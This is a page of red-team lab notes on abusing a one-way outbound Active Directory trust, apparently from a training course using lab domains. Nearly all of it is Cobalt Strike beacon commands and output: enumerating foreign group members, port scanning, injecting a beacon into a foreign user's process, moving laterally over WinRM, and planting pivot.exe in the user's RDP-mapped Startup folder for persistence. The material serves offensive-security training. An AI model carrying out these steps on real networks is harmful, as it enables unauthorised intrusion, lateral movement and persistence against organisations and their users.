One Way (Outbound)

Get foreign users in our current domain belongs to the outbound domain

beacon> powershell Get-DomainForeignGroupMember -Domain cyberbotic.io

GroupDomain             : cyberbotic.io
GroupName               : Jump Users
GroupDistinguishedName  : CN=Jump Users,CN=Users,DC=cyberbotic,DC=io
MemberDomain            : cyberbotic.io
MemberName              : S-1-5-21-3022719512-2989052766-178205875-1115
MemberDistinguishedName : CN=S-1-5-21-3022719512-2989052766-178205875-1115,CN=ForeignSecurityPrincipals,DC=cyberbotic,DC=io

Enumerate the privileges of this group (we can't convert SID)

beacon> powershell Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName

sql-1.cyberbotic.io
exch-1.cyberbotic.io

beacon> powershell Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

sql-1.cyberbotic.io
exch-1.cyberbotic.io

Compromise these machines and waits until the targeted user logs in

beacon> net logons
Logged on users at \\localhost:

ZPS\jean.wise
CYBER\SQL-1$

Does jean.wise have any privileged access in zeropointsecurity.local?
Can we reach any useful ports/services (445, 3389, 5985 etc) in zeropointsecurity.local?

beacon> portscan 10.10.18.0/24 139,445,3389,5985 none 1024

# Inject to external user session
beacon> inject 4960 x64 tcp-local
[+] established link to child beacon: 10.10.15.90

Now we can enumerate the external domain and access the external machines

beacon> remote-exec winrm sql01.zeropointsecurity.local whoami; hostname

zps\jean.wise
sql01

beacon> jump winrm64 sql01.zeropointsecurity.local pivot-sql-1
[+] established link to child beacon: 10.10.18.221

OR via Shares via RDP

beacon> ls \\tsclient\c

beacon> cd \\tsclient\c\Users\jean.wise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
beacon> ls

PreviousOne Way (Inbound)NextEvasion Techniques

Last updated 3 years ago